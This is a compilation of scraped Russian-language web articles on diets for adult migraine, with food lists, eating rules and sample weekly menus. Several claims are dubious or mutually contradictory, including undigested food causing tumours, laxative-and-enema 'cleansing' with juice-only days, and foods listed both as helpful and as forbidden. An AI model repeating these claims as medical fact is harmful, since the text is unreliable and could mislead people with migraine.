Диета и питание при мигрени у взрослых

Болезнь под названием мигрень, которая приносит нестерпимые страдания людям, широко распространена среди населения планеты. Классической формой данного заболевания страдает около 20% женщин и 5% мужчин, статистика нетипичных форм проблемы еще более неутешительная.

Причины разнообразны, порой даже неправильное питание и употребления ряда продуктов в больших количествах может спровоцировать появление болевых приступов. При этом справиться с проблемой поможет коррекция питания, даже если причина кроется не в пищевом факторе.

Диетотерапия – один из главных немедикаментозных методов борьбы с мигренью, как у взрослых, так и у детей. Помимо исключения вредных продуктов, такой подход подразумевает употребление той еды, которая может облегчить состояние при очередном приступе.

В рамках данной статьи выясним, какие правила необходимо внедрить в свою систему питания и какие продукты нежелательно употреблять при мигрени.

Значение диетотерапии при мигрени

Огромное количество заболеваний является прямым следствием неправильно построенной системы питания и систематических перееданий. Количество пищи, которая необходима организму, индивидуально для каждого человека, но чрезмерное употребление продуктов питания не ведет ни к чему хорошему.

Замечание врача: каждый человек должен понимать, что лучше кушать чаще и небольшими порциями, чем  за один раз съедать огромные количества пищи.

Наличие в организме большого количества непереваренной пищи грозит не только появлением ожирения, но и формированием опухолевых образований разного характера, что часто приводит к приступам сильной головной боли.

Кушать нужно расслабленно, стараясь не вести при этом никаких бесед, отложить книгу или выключить телевизор – мозгу нужно давать немного отдыха, иначе сильное постоянное напряжение может спровоцировать появление мигрени.

Диетотерапия применяется практически в каждом случае диагностирования мигрени и разделяется на несколько подтипов в зависимости от природы заболевания:

  • диеты гипоаллергенного характера. В той ситуации, когда приступы головной боли рассматриваются как часть аллергической реакции организма на конкретные продукты питания, используется данный подход, подразумевающий полное исключение факторов-провокаторов болей;
  • олигоантигенные системы питания также имеют антиаллергическую направленность, однако они применяются для детей с чертами гиперкинетического поведения (синдром нехватки внимания, гиперактивность в течение дня, энурезы ночного типа);
  • наиболее доступным элементом диетотерапии является использование витаминно-минеральных комплексов. Известно, что мигрень у человека может провоцировать нехваток магния, поэтому в рацион включаются продукты с большим содержанием данного элемента;
  • питание по «прицельному» типу подразумевает использование сразу двух методик, первая из которых направлена на улучшение усвояемости пищи, а вторая – на нормализацию функций органов выделения;
  • диеты с низком содержанием жиров направлены на снижение интенсивности и частоты приступов мигрени за счет уменьшения объемов потребления жира.

Правильно сформированная система питания полезна не только для борьбы с мигренью, она оказывает общий положительный эффект на организм, выступаю профилактической мерой для многих других заболеваний.

Исключаяиз рациона потенциально опасные продукты, диетотерапия помогает сформировать систему естественного поступления в организм всех необходимых веществ через пищу.

Для достижения желаемого эффекта и детям, и взрослым нужно придерживаться ряда общих правил:

  • питание должно быть минимум 4-ех разовым, так как наличие длительных «голодных» промежутков между приемами пищи и вообще голодание часто провоцируют новые приступы мигрени;
  • необходимо оградить свой рацион от излишеств – увлечение соленой, жирной, острой, маринованной пищей приводит к обострению заболевания;
  • переносимость того или иного продукта определяется в индивидуальном порядке. В данном контексте большое значение приобретает внимательное отношение к своему питанию – необходимо отслеживать, что и когда было употреблено в пищу и как это повлияло на самочувствие;
  • взрослым не стоит экспериментировать с различными экзотическими диетами для похудения – нетипичный рацион, непривычная схема питания является стрессом для организма, что и провоцирует появление очередного приступа;
  • не нужно давить на ребенка, если он не хочет доедать порцию или отказывается от какого-либо продукта – так создается эмоциональное напряжение, лучше поговорить с ребенком и выяснить, действительно ли он наелся и по какой именно причине он отказывается кушать.

Полезные и запрещенные продукты

Специалисты отмечают зависимость между употреблением конкретных продуктов и возникновением приступов мигрени. К их числу относят:

  • крепкий кофе и чай в больших количествах;
  • рыбная икра;
  • колбасная копченая продукция;
  • сметана и простокваша;
  • цитрусовые, сливы красного цвета, финики и бананы;
  • мороженое;
  • шоколад;
  • свежий лук.

На перечисленные продукты-провокаторы лучше не налегать, в противном случае можно только усугубить частоту появления приступов и их интенсивность. Стоит знать еще об одном списке – перечне продуктов, употребления которых лучше вообще избегать. Речь идет об:

  • алкогольные и энергетические напитки;
  • слишком острые и соленые продукты;
  • сыры, которые подвергались длительной выдержке;
  • пищевые добавки из списка запрещенных;
  • орехи;
  • консервированные бобовые продукты;
  • соевые изделия.

Совет врача: если Вы решили внести коррективы в назначенную врачом диету на основании собственных ощущений, лучше заранее проконсультироваться, не навредит ли такое изменение лично Вашему организму.

Продукты питания могут, как спровоцировать приступы сильной боли, так и облегчить их. Во время приступа мигрени хорошо помогают чаи с ромашкой или мятой, свежие соки из огурца, моркови, картофеля.

Взрослые могут прибегнуть к использованию отвара из коры калины. К сожалению, полностью устранить боль такие средства не способны, но облегчение за счет снижения интенсивности ощущений могут принести.

К снижению частоты болевых приступов приводит систематическое употребление в пищу:

  • мяса индейки;
  • печени (особенно актуально при сильных стрессах);
  • и семечек тыквы.

Тыквенные семечки — хороший способ снизить частоту болевых приступов

Специалисты также рекомендуют обязательно включить в свой рацион капусту брокколи, свежую зелень, нежирную говядину, болгарский перец, дыни, сухофрукты, нежирные молочные продукты, крупы и пасты, натуральные соки из овощей и фруктов.

Источник: https://monrb.ru/golovnye-boli/kak-pravilno-pitatsya-pri-migreni-chtoby-ne-navredit-sebe-eshhyo-bolshe.html

Диета при мигрени: для взрослых и детей (таблица)

Существуют различные способы избавления от головной боли. Однако не всегда они бывают эффективными. Специалисты рекомендуют для улучшения состояния в корне поменять образ жизни. Специальная диета при мигрени рассчитана на долгий срок. Рассмотрим, чем нужно питаться, чтобы избавиться от головных болей.

Как надо питаться

В первую очередь стоит сказать о том, что самостоятельно диета при мигрени не в силах окончательно излечить от болезни. Ее необходимо использовать в комплексе с другими методами лечения. Но и недооценивать роль питания на пути к выздоровлению от мигрени не нужно. Каждому известно, что человек является тем, что он ест. Если пища будет здоровой, то болезнь постепенно отступит.

Перечислим основные группы продуктов, способствующих избавлению от мигренозных приступов:

  1. Привычные для места жительства больного фрукты и овощи. Можно употреблять как сырыми, так и прошедшими термическую обработку.
  2. Каши, предпочтительно гречка и овсянка.
  3. Зеленый и травяной чаи.
  4. Изюм, курага, чернослив.
  5. Мясо нежирных сортов.
  6. Морепродукты, рыба.
  7. Молочные продукты.
  8. Масло подсолнечника, оливы.
  9. Свежие соки, кисели, домашние компоты.
  10. Грибы, особенно маслята, опята, белые.
  11. Миндаль, кедровые орехи.
  12. Морская капуста, щавель, шпинат.

Следует запомнить! В замороженном виде мясо концентрирует в себе соединение, которое вызывает головные боли. Поэтому при его покупке стоит отдавать предпочтение свежим продуктам.

Диета при мигрени

Для того чтобы избежать мигренозных приступов, потребуется снизить количество употребления некоторых продуктов. Существует и такая пища, от которой нужно избавить свой рацион раз и навсегда. Познакомимся подробнее с каждой группой.

Что под запретом

Диета при мигрени исключает из меню больного следующие продукты:

  • копченое мясо и рыба, колбаса копченых и сырокопченых видов;
  • продукты на основе почек, печенки, желудков, сердец;
  • любая спиртосодержащая продукция;
  • жирная свинина и баранина;
  • жареный миндаль, соленый арахис;
  • икра любой рыбы;
  • твердые сыры;
  • пирожки, сдобная выпечка;
  • майонез, жирные соусы.

Ограничение в продуктах

Следующие продукты допускаются при диете в ограниченных количествах. Для каждого существует своя индивидуальная норма. Итак, не следует злоупотреблять следующими продуктами питания:

  • сладости, шоколадные конфеты;
  • хлеб, булочки, сдоба;
  • вареная колбаса, сосиски, сардельки;
  • репчатый лук, редька;
  • студень, нежирные мясные бульоны;
  • крепкий кофе, сладкая газированная вода;
  • молочные продукты с высокой жирностью;
  • апельсины, грейпфрут.

Разрешенные продукты

Без ограничений диета при мигрени допускает употребление следующих продуктов:

  • растительные масла кукурузы, льна, кунжута;
  • ламинария, чернослив, болгарский перец;
  • бахчевые культуры;
  • домашние яйца;
  • супы на воде;
  • красный рис;
  • нежирная молочная продукция;
  • сезонные абрикосы, яблоки, черешня;
  • фиточаи, свежие соки.

Кофе и головные боли

Диета при мигрени допускает употребление небольшого количества кофе. Большинству больных можно пить не более одной чашки в день. До недавнего времени считалось, что кофе только вредит организму и усиливает головные боли.

Однако современные исследования показали, что умеренные дозы напитка благотворно влияют на самочувствие. Напиток активизирует деятельность кровеносной системы, коры больших полушарий, стимулирует умственную активность.

Соответственно, после его употребления головные боли стихают.

Главное, что стоит запомнить людям, подверженным мигренозным приступам − не злоупотреблять ароматным напитком во время диеты. Это связано с тем, что кофеин обладает сосудорасширяющим действием, поэтому может привести к увеличению показателей АД. Это, в свою очередь, может усугубить ситуацию.

  Что следует знать о базилярной мигрени

Рацион питания при мигрени

Выше были описаны основные особенности питания, когда болит голова. Однако для каждой группы больных диета при мигрени имеет свои особенности. Рассмотрим их по отдельности.

Для взрослых

По неизвестным до сих пор причинам, чаще всего бывают мигрени у взрослых людей от двадцати до сорока пяти лет. В этом случае специалисты рекомендуют отдать предпочтение полезным продуктам. Например:

  • кашам на воде;
  • овощным первым блюдам;
  • кисломолочной продукции;
  • фитонапиткам;
  • свежим фруктам;
  • брокколи, шпинату, щавелю;
  • фруктовым сокам.

Помимо этого, следует запомнить основные правила при приемах пищи:

  1. В первые дни мигренозного приступа допускается пить только овощные соки.
  2. Диета должна стать образом жизни, при улучшении состояния нельзя от нее отступать.
  3. Стоит навсегда забыть о спиртосодержащей продукции и табакокурении.

Если болезнь со зрительной аурой

Рацион при мигрени с аурой ничем не отличается от диеты при классических приступах. Однако существуют две очень важные особенности, которые нужно обязательно запомнить и ни в коем случае не игнорировать при питании со зрительной аурой:

  • нельзя пить кофе и крепкие чаи;
  • исключить из меню сладости и любые сахарсодержащие блюда.

Диета для детей

Детский организм более уязвим, поэтому нельзя игнорировать диету при мигрени у ребенка. Избавить малыша от болезненной симптоматики помогут следующие рекомендации:

  1. Необходимо обязательно включать в меню нежирные сорта мяса, тыкву, кабачки, все виды капусты.
  2. В питьевой режим потребуется включить томатный, капустный, морковный соки.
  3. Полезными будут травяные чаи. Предпочтение нужно отдать ромашке, мелиссе, шиповнику.

Важно! В детском возрасте часто хочется чего-нибудь сладенького. Поэтому конфеты и сладости потребуется заменить на сухофрукты.

Для беременных

Во время мигрени при ожидании малыша диета должна быть направлена не только на излечение от болезни, но и на здоровое питание в общем. Это связано с тем, что плод полностью получает питательные вещества из организма матери. Поэтому нужно составлять рацион, руководствуясь следующими рекомендациями:

  • нужно отказаться от сдобы и выпечки;
  • свести употребление кофе к одной чашке в день;
  • растительная пища должна быть сезонной;
  • потребуется ограничить количество солений и консервов;
  • основу диеты должны составлять свежие фрукты, отварные яйца, овощи с грядки, курага, молочные продукты.

Вещества, вызывающие обострение мигрени

Покупая продукты питания необходимо учитывать тот факт, что они могут быть напичканы вредными веществами, которые придают им привлекательный внешний вид и аппетитный аромат. Поэтому обязательно необходимо читать состав на упаковке. Рассмотрим, какие соединения могут навредить при мигрени.

Нитрат натрия

Часто используется для придания запаха и приятного розоватого оттенка колбасным изделиям, а также замороженному мясу и мясным изделиям. Вещество, вступая в реакцию с кровяными тельцами, затрудняет транспортировку кислорода к ЦНС. В результате мигренозный приступ обостряется.

Глутамат натрия

Делает аппетитной любую еду. Каждому знаком приятный запах чипсов или китайской лапши. Его придает именно глутамат натрия. Вещество вызывает привыкание, после него другая еда кажется пресной и невкусной. Соединение негативно сказывается на работе нервных клеток. Накопление в организме провоцирует мигрень.

Тирамин

Ядовитое вещество, в малых концентрациях содержится в некоторых натуральных продуктах, не приносит при этом никакого вреда.

При попадании искусственно созданных пищевых продуктов, напичканных тирамином, в организм происходит уменьшение просвета сосудов.

Это приводит к развитию гипертонической болезни и к перебоям в функционировании коры больших полушарий. Содержится в шоколаде, плавленых сырках, блюдах восточной кухни, например, в суши и роллах.

Фенилэтиламин

Вещество активизирует работу нейронов. Допускается лишь в небольших количествах. При интоксикации оказывает побочные действия на умственные процессы, приводит к рассеянности. Присутствует в тортах, шоколадной продукции, некоторых сырах.

  Как быстро купировать приступ мигрени

Аспартам

Отрицательно действует на все ткани и органы. Используется для придания сладкого вкуса. Даже у здоровых людей могут возникнуть сильные головные боли. А при мигрени приступы становятся более частыми и продолжительности. Больше всего содержится в сладких газировках, кондитерских изделиях, соусах.

Гистамин

Вещество значительно повышает густоту крови, отрицательно действует на сосудистый тонус, способствует снижению АД. В результате страдает ЦНС. Перебои в деятельности нейронов ведут к образованию сильных приступов мигрени. Входит в состав мяса, рыбы, морепродуктов, земляника, манго, грейпфрута.

Меню питания и режим питания

Приведем примерную диету при мигрени и распишем меню на неделю. Продукты допускается заменять разрешенными аналогами.

Понедельник

  • 7:00. Вареная греча, груша, творог, ромашковый отвар.
  • 10:00. Кусочек сыра, сок из моркови.
  • 13:00. Борщ на воде, белое мясо, огурец, ягодный морс.
  • 18:00. Натертая морковь, зеленый чай.

Вторник

  • 7:00. Бурый рис, половинка авокадо, бутерброд с сыром, чашка кофе.
  • 10:00. Компот, немного нежирной сметаны.
  • 13:00. Куриный бульон, отварной картофель, вареная рыба, компот из сухофруктов.
  • 18:00. Вареные креветки, брокколи, отвар из мелиссы.

Среда

  • 7:00. Овсянка на воде с изюмом, чашка кофе.
  • 10:00. Морс, кусочек сыра.
  • 13:00. Рассольник на воде, отварное белое мясо, томат, чай из чабреца.
  • 18:00. Паста, шпинат, кусочек ржаного хлеба, минеральная вода.

Четверг

  • 7:00. Гренки, персик, отвар из мелиссы.
  • 10:00. Винегрет, смесь соков моркови и тыквы.
  • 13:00. Пшеничный суп, рыба на пару, тушеная капуста, компот.
  • 18:00. Оладьи, ромашковый чай.

Пятница

  • 7:00. Мюсли, молоко, черный чай.
  • 10:00. Творог, кусочек дыни.
  • 13:00. Бульон на курице, отварное мясо, салат из моркови и капусты.
  • 18:00. Яйцо, яблоко, негазированная вода.

Суббота

  • 7:00. Бурый рис, чернослив, чашка кофе.
  • 10:00. Нежирный йогурт, финики.
  • 13:00. Перловый суп, кабачок, морской коктейль, имбирный чай.
  • 18:00. Филе свинины, салат из помидоров и огурцов, ягодный отвар.

Воскресенье

  • 7:00. Хлопья, персик, черный чай.
  • 10:00. Бутерброд с сыром, ягоды.
  • 13:00. Суп с овощами, тушеная капуста, рыба на пару, мятный чай.
  • 18:00. Кабачок, кусочек отварной свинины, морс.

Плюсы и минусы

Диета при мигрени имеет больше положительных сторон. Среди них:

  • для диеты выбираются продукты, полезные для всего организма;
  • помимо ухода головных болей, стабилизируются показатели АД, улучшается память, поднимается настроение;
  • вместе с мигренью уходят лишние килограммы;
  • диета подразумевает отказ от вредных привычек;
  • при соблюдении всех рекомендаций диета имеет продолжительный эффект.

Среди относительных недостатков:

  • лечебное меню поможет только в комплексе с другими методами лечения;
  • психологический дискомфорт при отказе от любимых продуктов во время диеты.

Питание при мигрени важные правила

Помимо того, что потребуется соблюдать диету при мигрени, необходимо не забывать основы правильного питания:

  1. Употребление пищи должно происходить строго по расписанию.
  2. Размер порций должен быть небольшим.
  3. При сильном чувстве голода допускается съесть один фрукт.
  4. Нельзя наедаться перед сном.
  5. Необходимо обеспечить обильное питье, до двух литров чистой негазированной воды в день.

Полезные продукты при мигрени

Помимо того, что существует список, включающий еду, доступную при мигрени, есть еще и продукты, которые обязательно необходимо включать в меню. Рассмотрим, что должно входить в состав диеты при мигрени:

  • имбирь;
  • рыба семейства лососевых;
  • семена тыквы, льна;
  • черешня;
  • мед;
  • отвары на основе ромашки.


Главное, что должен знать человек, подверженный мигренозным приступам − диета при мигрени будет полезной только в составе комплексной терапии. Чтобы не навредить здоровью, необходимо согласовать действия по избавлению от мигрени с медицинским работником.

Эффективность диеты при мигрени Ссылка на основную публикацию

Источник: https://bolitgolova.guru/migren/dieta-pri-migreni

Диета при мигрени: правила питания у взрослых, ограничения со зрительной аурой, можно ли алкоголь, коньяк

При мигрени один из главных факторов, провоцирующий наступление мигренозных атак – неправильное питание. С неприятной болезнью можно практически попрощаться, откорректировав свой ежедневный рацион. Важно исключить вредные элементы и обеспечить поступление необходимых веществ. О том, от каких продуктов лучше отказаться, а какие добавить в рацион, поговорим в данной статье.

Описание заболевания

Мигрень – это неврологическое хроническое заболевание с частыми приступами головной боли.

Она имеет повторяющийся пульсирующий характер, сосредотачивается в одной из частей головы. Она отличается продолжительным характером, не купируется лекарственными препаратами.

Также наблюдаются следующие симптомы: рвота, тошнота, непереносимость яркого света и громких звуков, вялость.

Заболевание бывает двух видов: с аурой и без. В первом случае наблюдается наличие у больного вкусовых, звуковых, зрительных ощущений, помутнение в глазах и нарушение чувствительности конечностей.

СПРАВКА! Мигрень могут спровоцировать: погодные условия (метеозависимость), физическое и эмоциональное перенапряжение, стресс, чувство голода.

Общие принципы питания у взрослых

Питание у людей, страдающих мигренью, должно быть выстроено с учетом совместимости продуктов друг с другом, а также их деления на полезные и вредные. Важно соблюдать время употребления пищи. Диета применяется для профилактики данного заболевания, а также уменьшения череды приступов боли.

ВНИМАНИЕ! Правильно подобранная диета не избавит от заболевания, но существенно улучшит самочувствие и предупредит появление новых приступов мигрени.

Специалисты выделяют следующие принципы питания при мигрени:

  1. Нежелательное переедание. Нельзя переедать не только вредные, но и даже полезные продукты, это приводит к нарушениям в организме.
  2. Не существует универсальной диеты, которая подходит всем. Продукты, подходящие одному, могут не подойти другому. Поэтому важно наблюдать за собственным рационом и реакцией организма.
  3. Не нужно делать длительные перерывы между приемами пищи. Так появляется чувство голода, которое провоцирует головную боль.
  4. Необходимо придерживаться правильного питания, количество приемов пищи – от 3 до 5 в день.
  5. Не экспериментируйте с употреблением разнообразных экзотических блюд, резкая смена продуктов может стать провокатором мигрени.

При мигрени разрешено употребление следующих продуктов:

  • Приготовленные на пару птица, рыба, мясо;
  • Молочные каши;
  • Свежие яйца;
  • Крупы: гречка, рис, овсянка;
  • Сухофрукты;
  • Сливочный сыр;
  • Сладкая кукуруза;
  • Овощи: картофель, помидоры, спаржа, свекла, кабачки, тыква, бобовые;
  • Супы;
  • Фрукты: яблоки, абрикосы, груши, персики;
  • Лосось, палтус;
  • Продукты, содержащие магний: кунжут, семечки тыквы и подсолнечника, лен;
  • Свежие соки домашнего приготовления: огуречный, виноградный, шпинатный, морковный, свекольный;
  • Морсы, чай (некрепкий);
  • Мед, варенье, желе.

ВАЖНО! Врачи рекомендуют включить в рацион продукты, содержащие рибофлавин, защищающий клетки мозга. Также данный компонент способствует усвоению цинка, фолиевой кислоты и железа. Содержат рибофлавин: баранина, брюссельская капуста, брокколи, нежирная говядина.

Также нужно употреблять достаточное количество воды, т.к. недостаток жидкости вызывает обезвоживание организма, приводящее к головным болям.

Страдающим мигренью необходимо употреблять имбирь, являющийся природным анальгетиком.

Не стоить забывать, что при длительном хранении белковые продукты накапливают тирамин, именно поэтому употреблять их необходимо лишь в свежем виде.

Открыть таблицу полезных продуктов

Какие продукты провоцируют приступ

Некоторые продукты содержат вещества, провоцирующие наступление головной боли:

  • тирамин;
  • нитритные добавки;
  • глютамат натрия;
  • сиротонин.
  • Данные компоненты способствуют расслаблению и последующему напряжению кровеносных сосудов, что приводит к приступу мигрени.
  • Одно из главных веществ, вызывающее головную боль – тирамин, представляющий собой компонент аминокислоты, который содержится в богатых белком и скоропортящихся продуктах.
  • Список продуктов, которые содержат тирамин, повышающий давление и приводящий к мигренозной атаке:
  1. Колбаса, сосиски;
  2. Кислая капуста;
  3. Сушеная, соленая, копченая рыба;
  4. Квас;
  5. Перезрелая фасоль;
  6. Алкоголь;
  7. Соевый соус, соевая паста;
  8. Сыр;
  9. Дрожжевые изделия (хлеб);
  10. Цитрусовые;
  11. Мясо дичи;
  12. Майонез.

Также необходимо вывести из рациона продукты, содержащие повышенное количество нитратов:

  1. Лапша быстрого приготовления;
  2. Бекон;
  3. Сыр долгой выдержки;
  4. Ранние арбузы.

Следует исключить медьсодержащую пищу:

  1. Орехи;
  2. Шоколад;
  3. Зародыши пшеницы.

Открыть таблицу запрещенных продуктов

Нежелательные продукты

Некоторые продукты можно употреблять с осторожностью, т.к. они способны в больших количествах накапливать вещества, вызывающие мигрень:

  1. Сливки, жирная сметана;
  2. Чеснок, хрен, лук, горчица;
  3. Экзотические фрукты: бананы, финики, авокадо;
  4. Холодец;
  5. Кофе;
  6. Горячий шоколад;
  7. Манка;
  8. Макароны.

Диета при болях со зрительной аурой

При заболевании со зрительными ощущениями следует придерживаться стандартной диеты при мигрени, а также соблюдать следующие правила:

  1. Не употреблять много сахара;
  2. Не употреблять продукты с содержанием глютамата натрия и кофеина;
  3. Исключить употребление газировок.
  4. Можно ли употреблять кофе и алкоголь

Специалисты утверждают, что продукты с содержанием кофеина способствуют появлению болей, однако в небольших количествах употребление напитка у некоторых людей способно остановить развитие приступа.

Это связано с тем, что кофеин не оказывает сильного влияния на давление. Употребление маленькой чашечки кофе в день благотворно влияет на организм: поднимает настроение и бодрит.

В обществе распространено мнение, что коньяк способен облегчить головную боль при мигрени. Однако, это не так. Алкогольные напитки способствуют расширению кровеносных сосудов, а при данном заболевании они и так расширены. Поэтому даже небольшая доза напитка может ухудшить состояние больного.

Источник: https://doktor-ok.com/zabolevaniya/golovnogo-mozga/migren/dieta.html

Как правильно питаться при мигрени | Меню на неделю

Мигрень – это сложное неврологическое заболевание, которое сопровождается приступами головной боли. В этой ситуации может помочь диета при мигрени, которая предполагает исключение продуктов-провокаторов и снабжение организма необходимыми питательными веществами.

Главные правила диеты

Соблюдать диету при мигрени несложно, так как она не предусматривает слишком суровых ограничений. Людям, страдающим этим недугом, следует придерживаться таких принципов организации системы питания:

  1. Питание должно быть дробным не менее четырёх-пяти раз в день. Интервалы между приемами пищи не должны превышать четырех часов.
  2. Категорически нельзя голодать. Но если аппетит полностью отсутствует, не нужно насильно принимать пищу, при этом воду пить обязательно.
  3. В ежедневном меню должна доминировать растительная пища (овощи, фрукты, крупы).
  4. Каждый день следует включать в рацион молочные продукты.
  5. Необходимо сократить количество жирной, копченой, соленой, маринованной, сладкой пищи.
  6. Не допускается вводить в рацион новые экзотические продукты.
  7. Нужно прислушиваться к своему организму и его реакции на потребляемые продукты. Лучше всего вести пищевой дневник.
  8. Во время диеты необходимо больше гулять, делать зарядку.

Таковы основные правила питания при мигрени у взрослых.

Продукты, рекомендуемые при мигрени

Во время мигрени рекомендуется потреблять свежую пищу, насыщенную витаминами, питательными веществами и микроэлементами. К полезным продуктам относятся:

  • экологически чистые местные овощи и фрукты, выращенные по сезону;
  • нежирные молочные продукты (молоко, сыры, творог);
  • свежее нежирное мясо (говядина, баранина), птица или рыба, приготовленные на пару или тушеные;
  • разнообразные крупы, макароны твердых сортов;
  • семена подсолнечника, тыквенные семечки;
  • травяной чай, натуральные соки, компоты;
  • оливковое, льняное, подсолнечное масло в небольших количествах.

Гастрономические ограничения при мигрени

Во время мигрени следует ограниченно употреблять следующие продукты:

  • жирные молочные продукты (сметана, сливки);
  • колбасные изделия, ветчина, балык;
  • выпечка из дрожжевого теста;
  • жирные мясные блюда;
  • соленая и копченая рыба;
  • острые соусы и приправы (перец, горчица, хрен);
  • экзотические фрукты.

Перечень запрещенных продуктов при мигрени

  • Продукты, способные вызвать приступы мигрени и ухудшение состояния, нужно убрать из рациона.
  • Например, диета при мигрени со зрительной аурой заключается в исключении из рациона пищи с содержанием тирамина (кофе, чай, йогурты, маринованные огурцы, квашеная капуста, соя, жирные бульоны, грибы, колбаса, шоколад, изюм, инжир).
  • Также при любом виде мигрени необходимо исключить:
  • алкоголь в любом виде;
  • сало, бекон и прочие жирные мясные изделия;
  • некоторые сорта выдержанного сыра с высоким процентом жирности;
  • бобовые культуры;
  • орехи;
  • рыбная икра;
  • копчености;
  • напитки с кофеином (кофе, крепкий чай, энергетические напитки).

Диета при мигрени на неделю

  1. Диета при мигрени у взрослых способна облегчить и уменьшить боль, но для максимального эффекта необходимо полностью её придерживаться.
  2. Пример лечебной диеты на неделю выглядит так.

  3. 1-2 день

В первые два дня рекомендуется устроить разгрузку для организма. Нужно пить свежие соки (морковный, огуречный, виноградный, свекольный, сок шпината и сельдерея).

Также желательно провести очистку организма: выпить слабительное вечером, а утром сделать клизму из отвара ромашки.

3 день

  • Первый завтрак: свежеотжатый сок.
  • Второй завтрак: кефир, сок, каша овсяная или гречневая.
  • Обед: овощной суп, картофельное пюре, отвар шиповника.
  • Ужин: кефир или простокваша.

4 день

  • Первый завтрак: каша на воде, свежеотжатый сок.
  • Второй завтрак: горсть семечек.
  • Обед: овощной суп, картофельное пюре, свежий огурец, травяной отвар.
  • Ужин: кефир или простокваша.

5 день

  • Первый завтрак: овощной салат, чёрный хлеб, каша на воде, отвар шиповника.
  • Второй завтрак: яблоко.
  • Обед: овощной суп, каша, салат из овощей, травяной отвар.
  • Ужин: нежирный творог с кефиром.

6-7 день

Рекомендуется питаться только свежими фруктами.

Выводы

Соблюдая лечебную диету при мигрени, можно добиться значительного улучшения самочувствия, но только лечащий врач способен назначить курс лечения для окончательного выздоровления.

Во избежание рецидивов необходимо больше двигаться, высыпаться, стараться не нервничать, отказаться от вредных прививок, пить много воды и следить за своим и питанием.

Питание при мигрени: Видео

[rBlock name=after_video return=1][rBlock name=after_sharing return=1]
[rBlock name=after_text return=1]МЕНЮ на НЕДЕЛЮ для ПОХУДЕНИЯ ???? ПРАВИЛЬНОЕ ПИТАНИЕ????Как Похудеть Без Диет????Olya PinsДневник питания Меню на 1500 ккалПитание для похудения. Как составить меню на день?Продукты, запрещенные при диабете. Жить здорово! 09.10.2018

Источник: https://reabilitilog.ru/informatciia/pitanie/vse-o-diete-pri-migreni.html

Диета при мигрени у взрослых

Диетотерапия – эффективное средство борьбы против многих недугов, в том числе и головной боли. Диета при мигрени у взрослых предполагает включение в рацион продуктов, позволяющих уменьшить приступы головной боли и их интенсивность.

Специалисты своим пациентам, страдающим мигренью, рекомендуют соблюдать такие правила питания:

  • Важно придерживаться 3–4-разового питания. Если пропустить прием пищи или увеличить интервал между ним, возникает вероятность обострения головной боли.
  • Нельзя злоупотреблять соленой, жирной, сладкой, копченой и маринованной пищей.
  • Желательно отказаться от экзотических продуктов и диет, из-за непривычного для организма питания могут усилиться приступы мигрени.
  • Категорически противопоказано голодание, поэтому важно отказаться от соблюдения жестких изнуряющих диет, способствующих снижению веса.

Существуют определенные продукты, употребление которых противопоказано при сильных головных болях.

По словам специалистов, в рационе человека, периодически или постоянно страдающего мигренью, не должно быть таких продуктов, как:

  • алкогольные напитки, особенно опасное красное вино и пиво;
  • субпродукты и ливерная колбаса;
  • жирная свинина;
  • салями, вяленое мясо, рыбные и мясные копчености;
  • некоторые сорта сыра, которые подвергались длительной выдержке – чеддер, бри, рокфор и другие;
  • бобовый;
  • орехи;
  • цитрусовые.

При мигрени рекомендуется соблюдать диету, состоящую из продуктов с низким содержанием тирамина. К числу полезных продуктов, способных уменьшить частоту и интенсивность приступов сильных головных болей, принадлежит кофе, свежие яйца, молочные продукты, крупы, свежие овощи и фрукты, нежирные супы домашнего приготовления, сахар, мед, различные сорта меда.

Для облегчения состояния больного во время приступов, а также в качестве профилактических действий рекомендуется ежедневно пить свежие натуральные соки.

В диетическое меню можно ввести грейпфрутовый, апельсиновый, виноградный, свекольный, огуречный, морковный, сок шпината и сельдерея.

В рационе также должны быть продукты с содержанием магния – дикий лосось, тыквенные семечки, кунжут, семена подсолнечника, лен.

Сок калины и черной смородины помогут предотвратить возникновение приступов головной боли. Пить нужно четверть стакана 4 раза в день.

Источник: https://violetnotes.com/?p=4164

Диета при мигрени у взрослых

Мигрень характеризуется приступообразными сильными болями, возникающими в лобной, височной области и над глазами. Чаще всего она сопровождается тошнотой и рвотой. Встречаются случаи онемения конечностей.

Причинами появления мигрени могут быть стрессы, проблемы с сосудами, а также неправильное питание. Поэтому лечение мигрени включает, в том числе и корректировку рациона питания. Диета при мигрени требует недюжинной воли, т. к. изначально представляет собой не что иное, как голодание.

Рекомендации по диете

Врачи выделяют основные правила соблюдения диетического питания при мигрени у взрослых:

  1. Необходимо питаться 3-4 раза в день. Забывчивость или излишняя занятость, приводящие к долгим промежуткам между приемами пищи, могут способствовать развитию новых приступов головной боли.
  2. Запрещается переедать, употреблять жирные, сладкие, соленые, острые блюда, а также насыщенные соусами и различными маринадами.
  3. Не рекомендуется экспериментировать с экзотикой. Резкая смена режима питания, пищи и способа ее приготовления также может спровоцировать мигрень.

Меню для диеты при метеоризме и вздутии живота

Список запрещенных продуктов

В перечень запрещенных к употреблению продуктов входят:

  • любой алкоголь;
  • колбасы, сардельки, субпродукты;
  • жирная свинина;
  • копченая рыба и мясо;
  • швейцарский сыр, чеддер, рокфор;
  • бобовые культуры;
  • орехи;
  • икра рыбы.

Что можно на диете при мигрени

Диета при мигрени рекомендует:

  • все растительные масла;
  • кофе, лишенный кофеина, слабо заваренный листовой чай, соки из фруктов, компоты, морсы, содержащие малое количество сахарного песка;
  • молоко низкой калорийности, плавленые сырки, брынза;
  • фрукты, произрастающие в данной местности (неэкзотические), вареные и протушенные овощи.

С чего следует начинать диету

Начало лечебного питания состоит в двухдневном ограничении пищи, то есть двое суток человек должен потреблять исключительно соки:

  • фреш из шпината;
  • сок из сельдерея;
  • апельсиновый нектар;
  • грейпфрутовый сок;
  • сок из винограда;
  • на основе домашних огурцов;
  • свекольный сок;
  • морковный.

Примерное меню

На третий день лечебного питания в рацион на завтрак вводится 200 мл свежевыжатого сока. На второй завтрак можно позволить себе морковный сок с кисломолочным напитком и 2 столовыми ложками гречки или овсянки. Обед должен состоять из жидкого супа на основе овощей, 2 ложек пюре из картофеля и настоя шиповника. Ужин включает простоквашу или свежий фреш.

  • На второй день можно дополнительно побаловать себя горстью орехов, одним огурцом и травяным чаем.
  • Отзывы людей, которые худели по диете Монтиньяка
  • Меню пятого диетического дня допускает употребление одного большого яблока и овощного ассорти с кусочком черного хлебца.

